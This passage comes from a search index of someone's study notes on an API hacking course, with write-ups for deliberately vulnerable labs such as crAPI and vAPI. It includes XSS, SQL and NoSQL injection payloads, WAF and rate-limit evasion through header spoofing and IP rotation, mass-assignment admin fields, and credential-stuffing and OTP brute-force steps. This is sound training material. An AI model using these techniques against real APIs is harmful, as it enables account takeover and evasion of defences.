                                  2. Open the browser, and select \"postman 5555\" in your Foxyproxy addon to proxy the traffic.

                                  3. Open your local crapi application in the browser: http://localhost:8888

                                  4. Run postman from the command line:

                                  postman\n

                                  5. Once postman is open, press on \"Capture traffic link\" (at the bottom right of the application). Set up the capture, and make sure that proxy is enabled in the application. A useful shortcut to go to Settings is CTRL-, (comma).

                                  6. Now you are capturing the traffic. Go through your crapi application and when done, go to postman and stop the capture.

                                  7. Final step is to filter out the requests you want and add them to a collection. In the collection, you will be able to organize these requests in folders /endpoints.

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-out-an-api-specification-using-mitmproxy2swagger","title":"Build out an API specification using mitmproxy2swagger","text":"","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps_1","title":"Steps","text":"

                                  1. From cli, run:

                                  mitmweb\n

                                  2. Select burp 8080 in the foxyproxy addon in your browser.

                                  3. Open a tab in your browser with the mitmweb proxy service: http://localhost:8081, and make sure that traffic is being captured there.

                                  4. Now you are capturing the traffic. Go through your crapi application and when done, turn off the foxyproxy.

                                  5. In the mitmweb service at http://localhost:8081, go to File>Save. A file called \"flows\" will be downloaded to your download folder.

                                  6. We need to parse this \"flows\" file into something understandable by Postman. For that, we will use a tool called mitmproxy2swagger, which will transform our captured traffic into an Open API 3.0 YAML file that can be viewed in a browser and imported as a collection into Postman. Run:

                                  sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow \n# -i: input    |  -o: output   | -p: target   |  -f: force format to the specified.\n

                                  7. Edit spec.yml to remove \"ignore:\" when it proceeds, and save changes .

                                  Run again mitmproxy2swagger to populate your spec with examples.

                                  sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow --examples\n# --examples will grab the previously created spec.yml and will populate it with real examples. We do this in two steps to avoid creating examples for request out of scope.  \n

                                  8. Open https://editor.swagger.io/ and click on File > Import. Import your spec.yml. The goal here is to validate the structure of your file.

                                  9. If everything is ok, open the postman application:

                                  postman\n

                                  10. In postman, go to File > Import, and select the spec.yml file. After importing it, you will be able to add it to a collection, and compare this collection against that created by browsing just with postman.

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#data-exposure","title":"Data Exposure","text":"

                                  Quoting directly from the course: \"When making a request to an endpoint, make sure you note the request\u00a0requirements. Requirements could include some form of authentication, parameters, path variables, headers, and information included in the body of the request. The API documentation should tell you what it requires of you and mention which part of the request that information belongs in. If the documentation provides examples, use them to help you. Typically, you can replace the example values with the ones you\u2019re looking for. The table below describes some of the conventions often used in these examples\".

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#api-documentation-conventions","title":"API Documentation Conventions","text":"Convention Example Meaning : or {} /user/:id /user/{id} /user/2727 /account/:username /account/{username} /account/scuttleph1sh The colon or curly brackets are used by some APIs to indicate a path variable. In other words, \u201c:id\u201d represents the variable for an ID number and \u201c{username}\u201d represents the account username you are trying to access. [] /api/v1/user?find=[name] Square brackets indicate that the input is optional. || \u201cblue\u201d || \u201cgreen\u201d || \u201cred\u201d Double bars represent different possible values that can be used.","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/","title":"Evasion and Combining techniques","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  Resources
                                  • w3af
                                  • WAFW00f
                                  • waf-bypass.com.
                                  • hacken.io
                                  • Awesome WAF.

                                  Here some basic techniques for evading or bypassing common API security controls.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#what-can-trigger-a-waf-web-applicatin-firewall","title":"What can trigger a WAF (Web Applicatin Firewall)?","text":"
                                  • Too many requests for inexisting resources.
                                  • To many requests in a short period of time.
                                  • Common SQL or XSS payloads attackes in requests.
                                  • Unusual behaviour (like a test for authorizathion vulnerabilities).
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-detect-a-waf","title":"How to detect a WAF","text":"

                                  What can a WAF do provided that RESTful APIs are stateless? They can use attribution to identify an atacker and for that they use: IP address, origin headers, authorization tokens and metadata (patterns of requests, rate of requests and the combination of the headers included in the requests).

                                  When it comes to Hacking APIs the best approach is first use the API as it was intended. Second, review the API responses for evidence of a WAF (in headers):

                                  1. Headers such as X-CDN means that the API is leveraging a Content Delivery Network (CDN), which often provides WAFs as a service.

                                  2. Use Burp Suite's Proxy and Repeater to watch if your requests are being sent to a proxy (302 sending you to a CDN).

                                  3. Use some tools:

                                  nmap -p 80 -script http-waf-detect $ip \n

                                  Also w3af, WAFW00f, and this recollection of handy tools: waf-bypass.com.

                                  Great article found when searchin for these tools: hacken.io.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques-for-evasion","title":"Techniques for evasion","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burners-accounts","title":"1. Burners accounts","text":"

                                  So there is a WAF. Before attacking, create several extra accounts (or tokens you can dispose). Watch out! When creating these accounts, make sure you use information not associated to your other accounts:

                                  - Different names and emails.\n- Different passwords.\n- Use VPN and disguise your IP.\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-bypassing-controls-with-string-terminators","title":"2. Bypassing controls with string terminators","text":"

                                  Simple payloads.

                                  Null bytes and other combinations of symbols are often interpreted as\u00a0string terminators. When not filtered out they could terminate the API security control filters.

                                  Here an example of a NULL byte included in a XSS combined with a SQL injection attack.

                                  POST /api/v1/user/profile/update\n--snip--\n\n     {\n        \u201cusername\u201d: \u201c<%00script>alert(1);</%00script>\u201d\n        \u201cpass\u201d:\u00a0\"%00'OR 1=1\"\n}\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#3-bypassing-controls-with-case-switching","title":"3. Bypassing controls with case switching","text":"

                                  Case switching the payload may provoke the WAF not detecting the attack.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#4-bypassing-controls-by-encoding-payloads","title":"4. Bypassing controls by encoding payloads","text":"

                                  If you are using Burp Suite, the module Decoder is perfect for quickly encoding or decoding a payload.

                                  Trick: double encoding your payload.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#tools","title":"Tools","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burpsuite-intruder","title":"1. BurpSuite Intruder","text":"

                                  Also, once you know which encoding technique is the efective one to bypass the WAF, use BurpSuite Intruder (section Payload processing under the Intruder Payload option) for configuring you attack. Intruder has some more worthy options:

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-wfuzz","title":"2. wfuzz","text":"

                                  wfuzz Cheat sheet.

                                  # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hackig-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separated requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and last with none. \n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hackig-example.com/api/v2/FUZZ\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#testing-rate-limits","title":"Testing rate limits","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rate-limits-what-for","title":"Rate limits. What for?","text":"
                                  • To avoid incurring into adittional costs associated with computing resources.
                                  • To avoid falling victim to a DoS attack.
                                  • To monetize.
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-know-if-rate-limit-is-in-place","title":"How to know if rate limit is in place","text":"
                                  • Consult API documentation.
                                  • Check APIs header (x-rate-limit, x-rate-limit-remaining, retry- after).
                                  • See response code 429.
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques","title":"Techniques","text":"

                                  1. Throttle your scanning

                                  In wfuzz:

                                  # Units are specified in seconds\n-s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n

                                  In BurpSuite:

                                  Set up Intruder's Resource Pool to limit the rate (in milliseconds).\n

                                  2. Bypassing paths

                                  When altering slightly the URL path, this could cause the API provider to handle the request diferently, potentially bypassing the rate limit.

                                  • Adding null bytes.
                                  • Altering the string ramdonly with various upper and lower case letter.
                                  • Adding meaningless parameters.

                                  3. Modifying Origin headers

                                  When the API provider use headers to enforce rate limiting, you could manipulate them:

                                  • X-Forwarded-For
                                  • X-Forwarded-Host
                                  • X-Host
                                  • X-Originating-IP
                                  • X-Remote-IP
                                  • X-Client-IP
                                  • X-Remote-Addr

                                  4. Modifying User-agent header

                                  You can use this dictionary: Seclist.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rotating-ip-addresses-with-burpsuite","title":"Rotating IP addresses with BurpSuite","text":"

                                  Add the extension IP Rotate.

                                  Requirements to install IP Rotate and have it working:

                                  • Install the tool Boto3.
                                  pip3 install boto3\n
                                  • Install the Jython standalone file from https://www.jython.org/download.html.
                                  • You will need an AWS account in which you can create an IAM user. There is a small cost associated with using the AWS API gateway. After downloading the IAM Services page, click Add Users and create an user account with programmatic access selected. On the \"Set Permissions page\", select \"Attach Existing Policies Directly\". NExt filter policies by searching for \"API\". Select the \"AmazonAPIGatewayAdministrator\" and \"AmazonAPIGatewayInvokeFullAccess\" permissions. Preceed to the review page.. No tags needed. Skip ahead and create the users. Now, download CSV file containing your user's access key.
                                  • Install IP Rotate
                                  • Open the IP Rotate Module and copy and paste access key from the user added in IAM service.
                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/","title":"Exploiting API Authorization","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bola-broken-object-level-authorization","title":"BOLA - Broken Object Level Authorization","text":"

                                  BOLA vulnerability allows UserA to request UserB's resources.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology","title":"Methodology","text":"
                                  1. Create a UserA account.
                                  2. Use the API and discover requests that involve resource IDs as UserA.
                                  3. Document requests that include resource IDs and should require authorization.
                                  4. Create a UserB account.
                                  5. Obtaining a valid UserB token and attempt to access UserA's resources.

                                  You could also do this by using UserB's resources with a UserA token.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bfla-broken-function-level-authorization","title":"BFLA - Broken Function Level Authorization","text":"

                                  BFLA is about UserA requesting to create, update, post or delete object values that belong to UserB.

                                  • BFLA request with lateral actions. UserA has the same role or privilege level than UserB.
                                  • BFLA request with escalated actions. UserB has a privilege level and UserA is able to perform actions reserved for UserB.

                                  Basically, BFLA attacks will consists on testing for various HTTP methods, seeking out actions of other users that you shouldn't be able to perform. Important: being careful with DELETE request.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology_1","title":"Methodology","text":"
                                  1. Postman. Go through the collection and select requests for resources of UserA. Focus on resources for private information. Focus also on HTTP verbs such as PUT, DELETE, POST.
                                  2. Swap out your UserA token for UserB's.
                                  3. Send GET, PUT, POST, and DELETE requests for UserA's resources using Userb's token.
                                  4. Investigate code 200, 401, and responses with strange lengths.

                                  BFLA pays special attention to requests that perform authorized actions.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#tools","title":"Tools","text":"
                                  • Postman: use the collection variables. Create specific collections for attacks.
                                  • BurpSute: use the Match and Replace functionality (tab PROXY>OPTIONS) to perform a large-scale replacement of a variable like an authorization token.
                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/","title":"Testing for improper assets management","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  Testing for improper assets management is all about discovering unsupported and non-production versions of an API.

                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#finding-api-versions","title":"Finding API versions","text":"

                                  Paths to check out:

                                  api.target.com/v3\n/api/v2/accounts\n/api/v3/accounts\n/v2/accounts\n

                                  API versioning could also be maintained as a header:

                                  Accept: version=2.0\nAccept api-version=3\n

                                  In addition versioning could also be set within a query parameter or request body.

                                  /api/accounts?ver=2\nPOST /api/accounts\n\n{\n\"ver\":1.0,\n\"user\":\"hapihacker\";\n}\n

                                  The discovery of non-production versions of an API might not be treated with the same security controls as the production version.

                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#exploiting-non-production-old-and-deprecate-api-versions","title":"Exploiting non-production, old and deprecate api versions","text":"

                                  We'll use postman. We are assuming that we have build our collection of requests and that we have identify those parameters regarding API version.

                                  0. On collection, right click and select \"Run Collection\". In the following screen you can unmark those requests that don't need to be run. But, first, define a Test.

                                  1. Run a test \"Status code: Code is 200\". In your collection options, go to tab Test and select the option that gives you this code:

                                  pm.test(\"Status code is 200\", function () { pm.response.to.have.status(200); })\n

                                  2. Run an unauthenticated baseline scan of the crAPI collection with the Collection Runner. Make sure that \"Save Responses\" is checked. Important. Review the results from your unauthenticated baseline scan to have an idea of how the API provider responds to requests using supported production versioning. After that, repeat the same but this time with an Authenticated user, to obtain an authenticated baseline.

                                  3. Next, use \"Find and Replace\" to turn the collection's current versions into a variable. For that, use Environmental variables.

                                  4. Run the collection with the variable set to v1, v2, v3, mobile, internal, test, uat..., and check out the different responses.

                                  In the course, we are using the crAPI app, and by replicating these steps you can spot different code responses for the request {{base_url}}/identity/api/auth/{{var}}/check-otp.\n/v1 received a 404 Not Found\n/v2 received a 500 response\n/v3 received a 500 response\n\nAlso, body response in /v2 is different from body response in /v3: \n\nThe /v2 password reset request responds with the body (left):\n{\"message\":\"Invalid OTP! Please try again..\",\"status\":500}\n\nThe /v3 password reset request responds with the body (right):\n{\"message\":\"ERROR..\",\"status\":500}\n\nThat might be a sign of improper assets management. Going further and testing it, you can discover that /v2 does not have a limitation on the number of times we can guess the OTP. With a four-digit OTP, we should be able to brute force the OTP within 10,000 requests. Since this endpoint manages resetting passwords, in the end this vulnerability allows you to gain control on any account in the system. \n
                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/","title":"Injection Attacks","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  The art of fuzzing is knowing which payload to send in the right request with the right tool.

                                  • Right payload can be narrow with reconnaissance.
                                  • Right requests are those that include user input (+ headers + url paths)
                                  • Right tool depends on strategy in fuzzing.

                                  Yes, when fuzzing we need a strategy.

                                  1. Identify endpoints (those where client input can interact with a database).

                                  2. Fuzzing and analyzing responses.

                                  3. Analyze responses:

                                  - Verbose error message\n- Response code\n- Time in response.\n

                                  4. Identify technolofy, version, services behind, security controls.

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#sql-injections","title":"SQL injections","text":"

                                  More aboyut SQL injectios. | How to perform a manual attack in SQL | Simple payloads | Tools: SQLmap

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#nosql-injections","title":"NOSQL injections","text":"

                                  Simple payloads.

                                  API commonly use NOSQL databases due to the fact that they scale well. These databases have unique structures, modes of querying... Requests will be alike but payloads may vary.

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#operating-system-command-injection","title":"Operating System Command Injection","text":"

                                  Simple payloads

                                  Some common operatiing system commands that are used in Injection attacks:

                                  • ipconfig
                                  • dir
                                  • ver
                                  • whoami
                                  • ifconfig
                                  • ls
                                  • pwd
                                  • whoami

                                  Target:

                                  • URL query string
                                  • Requests parameters
                                  • headers
                                  • requests that throw verbose error messages

                                  Techniques:

                                  • Pairing multiple commands in a single line.
                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#xss-cross-site-scripting","title":"XSS Cross-Site Scripting","text":"

                                  More about Cross-Site Scripting | Simple payloads

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#using-wfuff","title":"Using wfuff","text":"

                                  Having this request:

                                  POST /community/api/v2/coupon/validate-coupon HTTP/1.1\nhost: localhost:8888\naccept: */*\norigin: http://localhost:8888\nreferer: http://localhost:8888/shop\nConnection: close\nuser-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\ncontent-type: application/json\nContent-Length: 29\nsec-fetch-dest: empty\nsec-fetch-mode: cors\nsec-fetch-site: same-origin\nAccept-Encoding: gzip, deflate\naccept-language: en-US,en;q=0.5\nAuthorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\nCache-Control: no-cache\nPostman-Token: 5eb2f69b-6f89-460b-a49f-96c12edc9906\n\n{\"coupon_code\":{\"$ne\":\"-1\"} }\n

                                  And this response:

                                  HTTP/1.1 200 OK\nServer: openresty/1.17.8.2\nDate: Mon, 06 Feb 2023 16:05:31 GMT\nContent-Type: application/json\nConnection: close\nAccess-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE\nAccess-Control-Allow-Origin: *\nContent-Length: 79\n\n{\"coupon_code\":\"TRAC075\",\"amount\":\"75\",\"CreatedAt\":\"2022-11-11T19:22:26.134Z\"}\n

                                  We can use wfuzz like this:

                                  wfuzz -z file,/usr/share/wordlists/nosql.txt -H \"Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\" -H \"Content-Type: application/json\" -d \"{\\\"coupon_code\\\":FUZZ}\" --sc 200 -p localhost:8080 http://localhost:8888/community/api/v2/coupon/validate-coupon\n# -p localhost:8080 Redirect traffic to BurpSuite\n# --sc 200 Show code response 200\n
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/","title":"Mass assignment","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#what-is-mass-asset-management","title":"What is mass asset management?","text":"

                                  Basically UserA is said in the frontend to have the ability to post/update an object and we use that request to post/update a different object. We are sending a request that updates or overwrites server-side variables.

                                  Example:

                                  In a login process you are said to be able to send these parameters:

                                  {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    }\n

                                  But you send this:

                                  {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    \"credit\":10000\n}\n

                                  And now, your new created user will have a credit of 10,000 units.

                                  Other other key-values that you could include in the JSON POST body could be:

                                  \"isadmin\": true,  \n\"isadmin\":\"true\",  \n\"admin\": 1,  \n\"admin\": true,\n

                                  Key thing is this vulnerability is to identify vectors and entrypoints.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#methodology","title":"Methodology","text":"

                                  Identify endpoints that accept user input in your collection and that have the potential to modify objects. In the crAPI application this was about taking a BFLA to the next level:

                                  • Changing the request \"GET /workshop/api/shop/products\" (which displays existing products) to a \"POST /workshop/api/shop/products\", the app responded with a 400 Bad request code, and provided information with suggested fields for a POST request. Basically this post request is a way to submit requests to alter or create store products. So, we can create our own product items.
                                  • Now we can create a product with a value in negative. Adquiring that item will give you credit!
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#finding-mass-assignment-targets","title":"Finding Mass assignment targets","text":"

                                  To discover and exploit mass assignment vulnerabilities search for API requests that accept and process client input:

                                  1. Account registration

                                   - Intercept the web request\n- Craft this request with admin variables that you can set from API documentation\n

                                  2. Unauthorized access to organizations: If your user's objects belong to an organization with access to sensitive data, attempt to gain access to that organization.

                                  3. Resetting passwords, updating accounts, profiles or organizational objects: Do not limit yourself to the account registration process.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#tools","title":"Tools","text":"

                                  BurpSuite Intruder + Param Miner Arjun

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#using-param-miner-extension","title":"Using Param Miner extension","text":"

                                  1. Spotting sections focused on privileged actions. Some headers like:

                                  - Token: AdminToke\n-  Or in the json of the body: isadmin: true\n

                                  A nice way to do this is with Burp Extension: Param Miner.

                                  Param Miner can be downloaded from BApp Store in BurpSuite. To run it, right-click on a request (for instance, a request in Repeater and select Extensions>Param Miner>Guess params>Gues JSON parameter).

                                  Now, go to Extender tab> Extensions. And in the box below, select Output, and later \"Show in UI\":

                                  After a while you will see results from the attack.

                                  With Param Miner you can: fuzz unknown variables.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#arjun","title":"Arjun","text":"

                                  More about arjun.

                                  Arjun is a great tool for finding query parameters in URL endpoints.

                                  Advantages: - Supports GET/POST/POST-JSON/POST-XML requests. - It deals with rate-limits and timeouts.

                                  # Run arjun againts a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JDON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

                                  Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/","title":"Setting up the labs + Writeups","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  Here we'll be practising what we have learned in the course. There are plenty of labs in the wild. My intention here is to overview only the well known ones.

                                  Also, to make it to the end, I will include the writeups for every lab.

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-crapi","title":"Setting up crAPI","text":"

                                  Download it from: https://github.com/OWASP/crAPI

                                  mkdir ~/lab\ncd ~/lab\nsudo curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml\nsudo docker-compose pull\nsudo docker-compose -f docker-compose.yml --compatibility up -d\n
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-other-labs","title":"Setting up other labs","text":"

                                  Besides \"crapi\" and \"vapi\", the book \"Hacking APIs\" indicates some other interesting labs. Following chapter 5 of Hacking APIs book (\"Setting up vu\u00f1nerable API targets\"), I have installed:

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-app","title":"vapi app","text":"

                                  Source: https://github.com/roottusk/vapi

                                  APIs have become critical element of security landscape. In 2019, OWASP released a list of top 10 API Security vulnerabilities for the first time. Vapi stands for Vulnerable Adversely Programmed Interface, and it's a self-hostable PHP Interface that mimics OWASP API Top 10 scenarios.

                                  Install

                                  # Under /home/kali/labs\ngit clone https://github.com/roottusk/vapi.git\ncd vapi\ndocker-compose up -d\n# prerrequisite: having docker up and running\n

                                  Setting up Postman

                                  • Go to https://www.postman.com/roottusk/workspace/vapi/
                                  • Locate and import vAPI.postman_collection.json in Postman
                                  • Locate and Import vAPI_ENV.postman_environment.json in Postman
                                  • Configure the collection to use vAPI_ENV
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-devslop-pixi","title":"OWASP DevSlop Pixi","text":"

                                  Pixi is a MongoDB, Express.js, Angular, Node (MEAN) stack web applica\u00adtion that was designed with deliberately vulnerable APIs.

                                  To install it:

                                  cd ~/lab.\ngit clone https://github.com/DevSlop/Pixi.git\n

                                  To run it:

                                  cd ~/lab\nsudo docker-compose up\n

                                  Now, in the browser, go to: http://localhost:8000/login

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-juice-shop","title":"OWASP Juice Shop","text":"

                                  Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications.

                                  To install, go to the github page (https://github.com/juice-shop/juice-shop) and follow the isntructions.

                                  To run it:

                                  sudo docker run --rm -p 3000:3000 bkimminich/juice-shop\n

                                  Now, in the browser, go to: http://localhost:3000/#/

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#damn-vulnerable-graphql-application","title":"Damn-Vulnerable-GraphQL-Application","text":"

                                  Damn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities.

                                  To install, see the github page: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

                                  To run it:

                                  sudo docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga\n

                                  Now, in the browser, go to: http://localhost:5013/

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeups","title":"Writeups","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-writeup","title":"VAPI Writeup","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api1","title":"Writeup: API1","text":"

                                  Tip provided by vAPI: Broken Object Level Authorization. You can register yourself as a User , Thats it ....or is there something more?

                                  Solution:

                                  • Postman: Under folder API0, send a request to Create User. When done, the vAPI_ENV will be filled with two more variables: api1_id, api1_auth.
                                  • Postman: Under folder API1, send a request to Get User. Initially you will get the user that you have created. BUT if you modify the api1_id in the vAPI_ENV environment, then you will receive the data from (let's say) user with id 1. Or 2. Or 3. Or... Tadam! BOLA.
                                  • The flag is in user with id 1. See the response body:
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api2","title":"Writeup: API2","text":"

                                  Tip provided by vAPI: Broken Authentication. We don't seem to have credentials for this , How do we login? (There's something in the Resources Folder given to you).

                                  Solution:

                                  • Download creds.csv from https://raw.githubusercontent.com/roottusk/vapi/master/Resources/API2_CredentialStuffing/creds.csv.
                                  • Execute:
                                  cat creds.csv | cut -d, -f1 >users.txt\ncat creds.csv | cut -d, -f3 >pass.txt\n
                                  • Intercept in mode ON in Burp, enable foxyproxy at 8080 in the browser, and enable proxy in Postman at 8080.
                                  • Postman: Under folder API2, send a POST request to login and intercept it with Burp.
                                  • Burp: send the request to Intruder. Use Pitchfork attack with two payloads (Simplelist). One will be users.txt and second payload, pass.txt. Careful, remove the url encoding when setting up the payloads.
                                  • Burp: sort by Code (or length). You will get credentials for three users.
                                  • Postman: Login with the credentials of every user and save the file as an example just in case that you need to go back to this.
                                  • Postman: Once you are login into the app, a new enviromental variable has been saved in vAPI_ENV: api2_auth. With this authentication now we can resend the request Get Details. Flag will be in the response.
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api3","title":"Writeup: API3","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api4","title":"Writeup: API4","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api5","title":"Writeup: API5","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api6","title":"Writeup: API6","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api7","title":"Writeup: API7","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api8","title":"Writeup: API8","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api9","title":"Writeup: API9","text":"

                                  On this lab we'll be testing for improper asset management. The endpoint provided in the Postman collection is:

                                  Several interesting things to test:

                                  • Only a pin code with 4 digits are required to login.
                                  • We are running this request using version2 of an api.
                                  • There are two significant headers:
                                    • X-RateLimit-Limit set to 5
                                    • X-RateLimit Remaining set to 4.

                                  With this in mind we can run that request six times, obtaining a 500 internal server error instead of the 200 response:

                                  But, if we run the same request but modifying the POST request from v2 to v1, then:

                                  Headers \"X-RateLimit-Limit\" and \"X-RateLimit Remaining\" are missing. Looks like there is no Rate limit set for this request and a Brute Force attack can be conducted. So we do it using Burp Intruder and... bingo! we have the flag:

